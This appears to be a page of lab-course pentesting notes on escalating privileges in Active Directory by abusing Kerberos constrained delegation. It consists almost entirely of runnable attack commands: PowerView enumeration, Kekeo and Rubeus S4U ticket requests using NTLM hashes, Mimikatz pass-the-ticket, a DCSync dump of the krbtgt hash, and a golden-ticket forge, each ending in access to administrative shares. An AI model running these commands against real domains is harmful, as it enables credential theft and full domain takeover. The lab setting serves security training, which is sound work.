Priv Esc - Constrained Delegation

General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.

Constrained Delegation For Users

#General/Basic or Unconstrained Delegation which allows the first hop server
#web server in our example) to request access to any service on any computer in
#the domain.

import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION – T2A4D UserAccountControl attribute

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

#open powershell as normal user
cd .\kekeo
cd .\x64

#Get the TGT for websvc
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f


#Request the TGT for websvc
we are impersonating websvc with TGT_websvc to only the cifs/dcorp-mssql
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL


exit
import-module invoke-mimikatz

#Invoke-mimikatz to where the ticket was saved:
#Using mimikatz, inject the ticket:
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
klist


as you can see, we now have a ticket with Administrator to dcorp-mssql
#Confirm access. We only have access to the file system. We do not have access to the Enter-PSSession
ls \\dcorp-mssql\c$


#To abuse Constrained delegation using Rubeus, 
#we can use the following command (We are requesting a TGT and TGS' 
#in a single command):

.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
#Confirm access. We only have access to the file system. We do not have access to the Enter-PSSession
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Constrained Delegation - Server

#General/Basic or Unconstrained Delegation which allows the first hop server
#web server in our example) to request access to any service on any computer in
#the domain.

import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION – T2A4D UserAccountControl attribute

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth

----------------------- Let's Abuse it with Server Hash----------------------- 
Get-DomainComputer –TrustedToAuth


#Either plaintext password or NTLM hash is required. If we have access to dcorp-adminsrv hash
#Using asktgt from Kekeo, we request a TGT:
kekeo.exe
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:5e77978a734e3a7f3895fb0fdbda3b96


Using s4u from Kekeo_one (no SNAME validation): we resquest  ticket for time and for the LDAP service
tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

#Exit kekeo
exit

#invoke mimikatz from kekeo directory
. ..\..\invoke-mimikatz.ps1

#Using mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

#We can request any secret by IMPERSONATING the domain administrator and without compromising the domain administrator
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'






#Perform Golden Ticket attack with krbtgt hash show above
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:513 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
 


klist
ls \\dcorp-dc\c$
cd \\dcorp-dc\c$

PreviousPriv Esc – DNSAdmins NextPriv Esc – Unconstrained Delegation

Last updated 4 years ago

Was this helpful?